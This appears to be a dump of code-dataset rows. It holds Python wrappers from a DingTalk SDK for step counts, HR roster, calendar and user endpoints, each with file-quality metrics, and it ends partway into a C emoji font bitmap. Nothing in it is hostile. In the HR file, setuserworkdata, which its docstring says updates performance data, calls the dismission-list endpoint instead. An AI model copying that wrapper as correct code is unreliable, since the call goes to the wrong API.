{"userid": userid},
result_processor=lambda x: x['status']
)
def stepinfo_list(self, _type, object_id, stat_dates):
"""
获取个人或部门钉钉运动步数
:param _type: 0表示取用户步数,1表示取部门步数
:param object_id: 可以传入用户userid或者部门id
:param stat_dates: 时间列表
"""
if not isinstance(stat_dates, (list, tuple, set)):
stat_dates = [stat_dates]
stat_dates = ",".join(map(lambda x: x.strftime("%Y%m%d") if isinstance(x, datetime.date) else x, stat_dates))
return self._top_request(
"dingtalk.oapi.health.stepinfo.list",
{
"type": _type,
"object_id": object_id,
"stat_dates": stat_dates
}
)
def stepinfo_listbyuserid(self, userids, stat_date):
"""
批量查询多个用户的钉钉运动步数
:param userids: 员工userid列表,最多传50个
:param stat_date: 时间
"""
if isinstance(stat_date, datetime.date):
stat_date = stat_date.strftime("%Y%m%d")
if isinstance(userids, (list, tuple, set)):
userids = ",".join(map(to_text, userids))
return self._top_request(
"dingtalk.oapi.health.stepinfo.listbyuserid",
{
"userids": userids,
"stat_date": stat_date
}
)
| 1,792 | health | py | en | python | code | {"qsc_code_num_words": 185, "qsc_code_num_chars": 1792.0, "qsc_code_mean_word_length": 5.35135135, "qsc_code_frac_words_unique": 0.36756757, "qsc_code_frac_chars_top_2grams": 0.08181818, "qsc_code_frac_chars_top_3grams": 0.03939394, "qsc_code_frac_chars_top_4grams": 0.06060606, "qsc_code_frac_chars_dupe_5grams": 0.18585859, "qsc_code_frac_chars_dupe_6grams": 0.18585859, "qsc_code_frac_chars_dupe_7grams": 0.13939394, "qsc_code_frac_chars_dupe_8grams": 0.13939394, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.00409836, "qsc_code_frac_chars_whitespace": 0.31919643, "qsc_code_size_file_byte": 1792.0, "qsc_code_num_lines": 62.0, "qsc_code_num_chars_line_max": 118.0, "qsc_code_num_chars_line_mean": 28.90322581, "qsc_code_frac_chars_alphabet": 0.80737705, "qsc_code_frac_chars_comments": 0.12890625, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.08571429, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.12751213, "qsc_code_frac_chars_long_word_length": 0.08246708, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codepython_cate_ast": 1.0, "qsc_codepython_frac_lines_func_ratio": 0.08571429, "qsc_codepython_cate_var_zero": false, "qsc_codepython_frac_lines_pass": 0.0, "qsc_codepython_frac_lines_import": 0.11428571, "qsc_codepython_frac_lines_simplefunc": 0.0, "qsc_codepython_score_lines_no_logic": 0.31428571, "qsc_codepython_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codepython_cate_ast": 0, "qsc_codepython_frac_lines_func_ratio": 0, "qsc_codepython_cate_var_zero": 0, "qsc_codepython_frac_lines_pass": 0, "qsc_codepython_frac_lines_import": 0, "qsc_codepython_frac_lines_simplefunc": 0, "qsc_codepython_score_lines_no_logic": 0, "qsc_codepython_frac_lines_print": 0} |
007gzs/dingtalk-sdk | dingtalk/client/api/employeerm.py | # -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
import datetime
import json
from optionaldict import optionaldict
from dingtalk.core.utils import to_text
from dingtalk.client.api.base import DingTalkBaseAPI
class Employeerm(DingTalkBaseAPI):
DATE_TIME_FORMAT = '%Y-%m-%d %H:%M:%S'
def get(self, userid):
"""
获取智能人事员工花名册详细数据
:param userid: 查询用户userid
:return:
"""
return self._top_request(
'dingtalk.corp.hrm.employee.get',
{'userid': userid},
result_processor=lambda x: x['group_list']
)
def list(self, userid_list, field_filter_list=()):
"""
批量获取员工花名册字段信息
智能人事业务,企业/ISV根据员工id批量访问员工花名册信息
:param userid_list: 员工id列表
:param field_filter_list: 需要获取的花名册字段信息
"""
if isinstance(userid_list, (list, tuple, set)):
userid_list = ','.join(map(to_text, userid_list))
if isinstance(field_filter_list, (list, tuple, set)):
field_filter_list = ','.join(map(to_text, field_filter_list))
return self._top_request(
"dingtalk.oapi.smartwork.hrm.employee.list",
{
"userid_list": userid_list,
"field_filter_list": field_filter_list
}
)
def querypreentry(self, offset=0, size=50):
"""
智能人事查询公司待入职员工列表
智能人事业务,企业/ISV分页查询公司待入职员工id列表
:param offset: 分页起始值,默认0开始
:param size: 分页大小,最大50
"""
return self._top_request(
"dingtalk.oapi.smartwork.hrm.employee.querypreentry",
{
"offset": offset,
"size": size
}
)
def queryonjob(self, status_list=(), offset=0, size=50):
"""
智能人事查询公司在职员工列表
智能人事业务,提供企业/ISV按在职状态分页查询公司在职员工id列表
:param status_list: 在职员工子状态筛选。2,试用期;3,正式;5,待离职;-1,无状态
:param offset: 分页起始值,默认0开始
:param size: 分页大小,最大50
"""
if isinstance(status_list, (list, tuple, set)):
status_list = ','.join(map(to_text, status_list))
return self._top_request(
"dingtalk.oapi.smartwork.hrm.employee.queryonjob",
{
"status_list": status_list,
"offset": offset,
"size": size
}
)
def querydimission(self, offset=0, size=50):
"""
智能人事查询公司离职员工列表
智能人事业务,提供企业/ISV分页查询公司离职员工id列表
:param offset: 分页游标,从0开始。根据返回结果里的next_cursor是否为空来判断是否还有下一页,且再次调用时offset设置成next_cursor的值
:param size: 分页大小,最大50
"""
return self._top_request(
"dingtalk.oapi.smartwork.hrm.employee.querydimission",
{
"offset": offset,
"size": size
}
)
def listdimission(self, userid_list=()):
"""
批量获取员工离职信息
根据传入的staffId列表,批量查询员工的离职信息
:param userid_list: 员工id
"""
if isinstance(userid_list, (list, tuple, set)):
userid_list = ','.join(map(to_text, userid_list))
return self._top_request(
"dingtalk.oapi.smartwork.hrm.employee.listdimission",
{
"userid_list": userid_list
}
)
def addpreentry(self, name, mobile, pre_entry_time=None, op_userid=None, extend_info=None):
"""
智能人事添加企业待入职员工
:param name: 员工姓名
:param mobile: 手机号
:param pre_entry_time: 预期入职时间
:param op_userid: 操作人userid
:param extend_info: 扩展信息
:return:
"""
if isinstance(pre_entry_time, (datetime.date, datetime.datetime)):
pre_entry_time = pre_entry_time.strftime(self.DATE_TIME_FORMAT)
if isinstance(extend_info, dict):
extend_info = json.dumps(extend_info)
return self._top_request(
"dingtalk.oapi.smartwork.hrm.employee.addpreentry",
{
"param": optionaldict({
"name": name,
"mobile": mobile,
"pre_entry_time": pre_entry_time,
"op_userid": op_userid,
"extend_info": extend_info
})
}
)
def getdismissionlist(self, op_userid, current=1, page_size=100):
"""
获取离职人员信息
:param op_userid: 操作人userid
:param current: 第几页,从1开始
:param page_size: 一页多少数据,在1-100之间
:return:
"""
return self._top_request(
'dingtalk.corp.hrm.employee.getdismissionlist',
{'op_userid': op_userid, 'current': current, 'page_size': page_size},
result_processor=lambda x: x['page']
)
def setuserworkdata(self, op_userid, userid, data_value, data_desc=None):
"""
更新用户绩效数据
:param op_userid: 操作人userid,必须是拥有被操作人操作权限的管理员userid
:param userid: 被操作人userid
:param data_value: 数据值,可以为数值或者字符串
:param data_desc: 数据项描述信息
:return:
"""
hrm_api_user_data_model = {'userid': userid, 'data_value': data_value, 'data_desc': data_desc}
return self._top_request(
'dingtalk.corp.hrm.employee.getdismissionlist',
{'op_userid': op_userid, 'hrm_api_user_data_model': hrm_api_user_data_model}
)
def modjobinfo(self, op_userid, userid, employee_type=None, employee_status=None, confirm_join_time=None,
probation_period_type=None, regular_time=None, join_working_time=None, birth_time=None):
"""
更新员工工作信息
:param op_userid: 操作人userid,必须是拥有被操作人操作权限的管理员userid
:param userid: 被操作人userid
:param employee_type: 员工类型(1:全职,2:兼职,3:实习,4:劳务派遣,5:退休返聘,6:劳务外包)
:param employee_status: 员工状态(2:试用,3:正式)
:param confirm_join_time: 入职日期
:param probation_period_type: 试用期(1:无试用期,2:1个月,3:2个月,4:3个月,5:4个月,6:5个月,7:6个月,8:其他)
:param regular_time: 转正时间
:param join_working_time: 首次参加工作时间
:param birth_time: 生日日期
:return:
"""
if confirm_join_time is not None and isinstance(confirm_join_time, (datetime.date, datetime.datetime)):
confirm_join_time = confirm_join_time.strftime('%Y-%m-%d %H:%M:%S')
if regular_time is not None and isinstance(regular_time, (datetime.date, datetime.datetime)):
regular_time = regular_time.strftime('%Y-%m-%d %H:%M:%S')
if join_working_time is not None and isinstance(join_working_time, (datetime.date, datetime.datetime)):
join_working_time = join_working_time.strftime('%Y-%m-%d %H:%M:%S')
if birth_time is not None and isinstance(birth_time, (datetime.date, datetime.datetime)):
birth_time = birth_time.strftime('%Y-%m-%d %H:%M:%S')
hrm_api_job_model = {
'userid': userid,
'employee_type': employee_type,
'employee_status': employee_status,
'confirm_join_time': confirm_join_time,
'probation_period_type': probation_period_type,
'regular_time': regular_time,
'join_working_time': join_working_time,
'birth_time': birth_time
}
return self._top_request(
'dingtalk.corp.hrm.employee.modjobinfo',
{'op_userid': op_userid, 'hrm_api_job_model': hrm_api_job_model}
)
| 7,387 | employeerm | py | en | python | code | {"qsc_code_num_words": 810, "qsc_code_num_chars": 7387.0, "qsc_code_mean_word_length": 5.12962963, "qsc_code_frac_words_unique": 0.22469136, "qsc_code_frac_chars_top_2grams": 0.03080626, "qsc_code_frac_chars_top_3grams": 0.03128761, "qsc_code_frac_chars_top_4grams": 0.04813478, "qsc_code_frac_chars_dupe_5grams": 0.44837545, "qsc_code_frac_chars_dupe_6grams": 0.31648616, "qsc_code_frac_chars_dupe_7grams": 0.24476534, "qsc_code_frac_chars_dupe_8grams": 0.24476534, "qsc_code_frac_chars_dupe_9grams": 0.21588448, "qsc_code_frac_chars_dupe_10grams": 0.14151625, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.0104712, "qsc_code_frac_chars_whitespace": 0.30188168, "qsc_code_size_file_byte": 7387.0, "qsc_code_num_lines": 215.0, "qsc_code_num_chars_line_max": 112.0, "qsc_code_num_chars_line_mean": 34.35813953, "qsc_code_frac_chars_alphabet": 0.79522978, "qsc_code_frac_chars_comments": 0.19832138, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.19130435, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.16788049, "qsc_code_frac_chars_long_word_length": 0.0907563, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codepython_cate_ast": 1.0, "qsc_codepython_frac_lines_func_ratio": 0.08695652, "qsc_codepython_cate_var_zero": false, "qsc_codepython_frac_lines_pass": 0.0, "qsc_codepython_frac_lines_import": 0.05217391, "qsc_codepython_frac_lines_simplefunc": 0.0, "qsc_codepython_score_lines_no_logic": 0.24347826, "qsc_codepython_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codepython_cate_ast": 0, "qsc_codepython_frac_lines_func_ratio": 0, "qsc_codepython_cate_var_zero": 0, "qsc_codepython_frac_lines_pass": 0, "qsc_codepython_frac_lines_import": 0, "qsc_codepython_frac_lines_simplefunc": 0, "qsc_codepython_score_lines_no_logic": 0, "qsc_codepython_frac_lines_print": 0} |
007gzs/dingtalk-sdk | dingtalk/client/api/calendar.py | # encoding: utf-8
from __future__ import absolute_import, unicode_literals
from dingtalk.client.api.base import DingTalkBaseAPI
class Calendar(DingTalkBaseAPI):
def create(self, create_vo):
"""
创建日程
:param create_vo: 创建日程实体
"""
return self._top_request(
"dingtalk.oapi.calendar.create",
{"create_vo": create_vo}
)
def list(
self,
user_id,
calendar_folder_id='',
time_min=None,
i_cal_uid='',
single_events='',
page_token='',
max_results=250,
time_max=None
):
"""
日程查询
:param user_id: 员工ID
:param calendar_folder_id: 钉钉日历文件夹的对外id,默认是自己的默认文件夹
:param time_min: 查询时间下限
:param i_cal_uid: 日程跨域唯一id,用于唯一标识一组关联日程事件
:param single_events: 是否需要展开循环日程
:param page_token: 查询对应页,值有上一次请求返回的结果里对应nextPageToken
:param max_results: 结果返回的最多数量,默认250,最多返回2500
:param time_max: 查询时间上限
"""
return self._top_request(
"dingtalk.oapi.calendar.list",
{
"user_id": user_id,
"calendar_folder_id": calendar_folder_id,
"time_min": time_min,
"i_cal_uid": i_cal_uid,
"single_events": single_events,
"page_token": page_token,
"max_results": max_results,
"time_max": time_max
}
)
def delete(self, userid='', calendar_id=''):
"""
日程删除
:param userid: 员工id
:param calendar_id: 日程id
"""
return self._top_request(
"dingtalk.oapi.calendar.delete",
{
"userid": userid,
"calendar_id": calendar_id
}
)
| 1,855 | calendar | py | en | python | code | {"qsc_code_num_words": 178, "qsc_code_num_chars": 1855.0, "qsc_code_mean_word_length": 5.13483146, "qsc_code_frac_words_unique": 0.34831461, "qsc_code_frac_chars_top_2grams": 0.03501094, "qsc_code_frac_chars_top_3grams": 0.07002188, "qsc_code_frac_chars_top_4grams": 0.06564551, "qsc_code_frac_chars_dupe_5grams": 0.25382932, "qsc_code_frac_chars_dupe_6grams": 0.18599562, "qsc_code_frac_chars_dupe_7grams": 0.13129103, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.00961538, "qsc_code_frac_chars_whitespace": 0.38328841, "qsc_code_size_file_byte": 1855.0, "qsc_code_num_lines": 71.0, "qsc_code_num_chars_line_max": 62.0, "qsc_code_num_chars_line_mean": 26.12676056, "qsc_code_frac_chars_alphabet": 0.78933566, "qsc_code_frac_chars_comments": 0.21509434, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.075, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.15023112, "qsc_code_frac_chars_long_word_length": 0.06548536, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codepython_cate_ast": 1.0, "qsc_codepython_frac_lines_func_ratio": 0.075, "qsc_codepython_cate_var_zero": false, "qsc_codepython_frac_lines_pass": 0.0, "qsc_codepython_frac_lines_import": 0.05, "qsc_codepython_frac_lines_simplefunc": 0.0, "qsc_codepython_score_lines_no_logic": 0.225, "qsc_codepython_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codepython_cate_ast": 0, "qsc_codepython_frac_lines_func_ratio": 0, "qsc_codepython_cate_var_zero": 0, "qsc_codepython_frac_lines_pass": 0, "qsc_codepython_frac_lines_import": 0, "qsc_codepython_frac_lines_simplefunc": 0, "qsc_codepython_score_lines_no_logic": 0, "qsc_codepython_frac_lines_print": 0} |
007gzs/dingtalk-sdk | dingtalk/client/api/user.py | # -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from dingtalk.client.api.base import DingTalkBaseAPI
class User(DingTalkBaseAPI):
def auth_scopes(self):
"""
获取CorpSecret授权范围
:return:
"""
return self._get('/auth/scopes')
def get_org_user_count(self, only_active):
"""
获取企业员工人数
:param only_active: 是否包含未激活钉钉的人员数量
:return: 企业员工数量
"""
return self._get(
'/user/get_org_user_count',
{'onlyActive': 0 if only_active else 1},
result_processor=lambda x: x['count']
)
def getuserinfo(self, code):
"""
通过CODE换取用户身份
:param code: requestAuthCode接口中获取的CODE
:return:
"""
return self._get(
'/user/getuserinfo',
{'code': code}
)
def get(self, userid, lang='zh_CN'):
"""
获取成员详情
:param userid: 员工在企业内的UserID,企业用来唯一标识用户的字段
:param lang: 通讯录语言(默认zh_CN,未来会支持en_US)
:return:
"""
return self._get(
'/user/get',
{'userid': userid, 'lang': lang}
)
def create(self, user_data):
"""
创建成员
:param user_data: 用户信息
:return: userid
"""
return self._post(
'/user/create',
user_data,
result_processor=lambda x: x['userid']
)
def update(self, user_data):
"""
更新成员
:param user_data: 用户信息
:return:
"""
return self._post(
'/user/update',
user_data
)
def delete(self, userid):
"""
删除成员
:param userid: 员工在企业内的UserID,企业用来唯一标识用户的字段
:return:
"""
return self._get(
'/user/delete',
{'userid': userid}
)
def batchdelete(self, user_ids):
"""
批量删除成员
:param user_ids: 员工UserID列表。列表长度在1到20之间
:return:
"""
return self._post(
'/user/delete',
{'useridlist': list(user_ids)}
)
def simple_list(self, department_id, offset=0, size=100, order='custom', lang='zh_CN'):
"""
获取部门成员
:param department_id: 获取的部门id
:param offset: 偏移量
:param size: 表分页大小,最大100
:param order: 排序规则
entry_asc 代表按照进入部门的时间升序
entry_desc 代表按照进入部门的时间降序
modify_asc 代表按照部门信息修改时间升序
modify_desc 代表按照部门信息修改时间降序
custom 代表用户定义排序
:param lang: 通讯录语言(默认zh_CN另外支持en_US)
:return:
"""
return self._get(
'/user/simplelist',
{
'department_id': department_id,
'offset': offset,
'size': size,
'order': order,
'lang': lang
}
)
def list(self, department_id, offset=0, size=100, order='custom', lang='zh_CN'):
"""
获取部门成员(详情)
:param department_id: 获取的部门id
:param offset: 偏移量
:param size: 表分页大小,最大100
:param order: 排序规则
entry_asc 代表按照进入部门的时间升序
entry_desc 代表按照进入部门的时间降序
modify_asc 代表按照部门信息修改时间升序
modify_desc 代表按照部门信息修改时间降序
custom 代表用户定义排序
:param lang: 通讯录语言(默认zh_CN另外支持en_US)
:return:
"""
return self._get(
'/user/list',
{
'department_id': department_id,
'offset': offset,
'size': size,
'order': order,
'lang': lang
}
)
def get_admin(self):
"""
获取管理员列表
:return: sys_level 管理员角色 1:主管理员,2:子管理员
"""
return self._get(
'/user/get_admin',
result_processor=lambda x: x['admin_list']
)
def can_access_microapp(self, app_id, user_id):
"""
获取管理员的微应用管理权限
:param app_id: 微应用id
:param user_id: 员工唯一标识ID
:return: 是否能管理该微应用
"""
return self._get(
'/user/can_access_microapp',
{'appId': app_id, 'userId': user_id},
result_processor=lambda x: x['canAccess']
)
def get_userid_by_unionid(self, unionid):
"""
根据unionid获取成员的userid
:param unionid: 用户在当前钉钉开放平台账号范围内的唯一标识
:return:
"""
return self._get(
'/user/getUseridByUnionid',
{'unionid': unionid}
)
def get_dept_member(self, dept_id):
"""
获取部门用户userid列表
:param dept_id: 用户在当前钉钉开放平台账号范围内的唯一标识
:return 部门userid列表:
"""
return self._get(
'/user/getDeptMember',
{'deptId': dept_id},
result_processor=lambda x: x['userIds']
)
def listbypage(self, department_id, offset=0, size=100, order='custom', lang='zh_CN'):
"""
获取部门用户
:param department_id: 获取的部门id
:param offset: 偏移量
:param size: 表分页大小,最大100
:param order: 排序规则
entry_asc 代表按照进入部门的时间升序
entry_desc 代表按照进入部门的时间降序
modify_asc 代表按照部门信息修改时间升序
modify_desc 代表按照部门信息修改时间降序
custom 代表用户定义排序
:param lang: 通讯录语言(默认zh_CN另外支持en_US)
:return:
"""
return self._get(
'/user/list',
{
'department_id': department_id,
'offset': offset,
'size': size,
'order': order,
'lang': lang
}
)
def get_admin_scope(self, userid):
"""
查询管理员通讯录权限范围
:param userid: 用户id
"""
return self._top_request(
"dingtalk.oapi.user.get_admin_scope",
{"userid": userid},
result_processor=lambda x: x['dept_ids']
)
| 6,121 | user | py | en | python | code | {"qsc_code_num_words": 537, "qsc_code_num_chars": 6121.0, "qsc_code_mean_word_length": 5.2849162, "qsc_code_frac_words_unique": 0.25139665, "qsc_code_frac_chars_top_2grams": 0.05637773, "qsc_code_frac_chars_top_3grams": 0.05496829, "qsc_code_frac_chars_top_4grams": 0.06589147, "qsc_code_frac_chars_dupe_5grams": 0.50422833, "qsc_code_frac_chars_dupe_6grams": 0.40133897, "qsc_code_frac_chars_dupe_7grams": 0.37491191, "qsc_code_frac_chars_dupe_8grams": 0.37491191, "qsc_code_frac_chars_dupe_9grams": 0.37491191, "qsc_code_frac_chars_dupe_10grams": 0.37491191, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.00815065, "qsc_code_frac_chars_whitespace": 0.41872243, "qsc_code_size_file_byte": 6121.0, "qsc_code_num_lines": 246.0, "qsc_code_num_chars_line_max": 92.0, "qsc_code_num_chars_line_mean": 24.88211382, "qsc_code_frac_chars_alphabet": 0.78948848, "qsc_code_frac_chars_comments": 0.30142134, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.32038835, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.14849188, "qsc_code_frac_chars_long_word_length": 0.03103248, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codepython_cate_ast": 1.0, "qsc_codepython_frac_lines_func_ratio": 0.15533981, "qsc_codepython_cate_var_zero": false, "qsc_codepython_frac_lines_pass": 0.0, "qsc_codepython_frac_lines_import": 0.01941748, "qsc_codepython_frac_lines_simplefunc": 0.0, "qsc_codepython_score_lines_no_logic": 0.33980583, "qsc_codepython_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codepython_cate_ast": 0, "qsc_codepython_frac_lines_func_ratio": 0, "qsc_codepython_cate_var_zero": 0, "qsc_codepython_frac_lines_pass": 0, "qsc_codepython_frac_lines_import": 0, "qsc_codepython_frac_lines_simplefunc": 0, "qsc_codepython_score_lines_no_logic": 0, "qsc_codepython_frac_lines_print": 0} |
0015/Grid_Board | main/NotoEmoji64.c | /*******************************************************************************
* Size: 64 px
* Bpp: 1
* Opts: --bpp 1 --size 64 --no-compress --stride 1 --align 1 --font NotoEmoji-Regular.ttf --range 10084,65039,9989,10004,10060,10006,128512-128591,128640-128767,128192-128255 --format lvgl -o NotoEmoji64.c
******************************************************************************/
#ifdef __has_include
#if __has_include("lvgl.h")
#ifndef LV_LVGL_H_INCLUDE_SIMPLE
#define LV_LVGL_H_INCLUDE_SIMPLE
#endif
#endif
#endif
#ifdef LV_LVGL_H_INCLUDE_SIMPLE
#include "lvgl.h"
#else
#include "lvgl/lvgl.h"
#endif
#ifndef NOTOEMOJI64
#define NOTOEMOJI64 1
#endif
#if NOTOEMOJI64
/*-----------------
* BITMAPS
*----------------*/
/*Store the image of the glyphs*/
static LV_ATTRIBUTE_LARGE_CONST const uint8_t glyph_bitmap[] = {
/* U+2705 "✅" */
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xdf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc1,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc0,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc0,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0,
0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0,
0x7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0,
0x3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0,
0x3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0,
0x1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0,
0x1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0,
0x1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0,
0x1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0,
0x1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0,
0x0, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0x0, 0xff, 0xff, 0xff, 0xe3, 0xff, 0xff, 0xf8,
0x0, 0xff, 0xff, 0xff, 0xc0, 0x7f, 0xff, 0xf8,
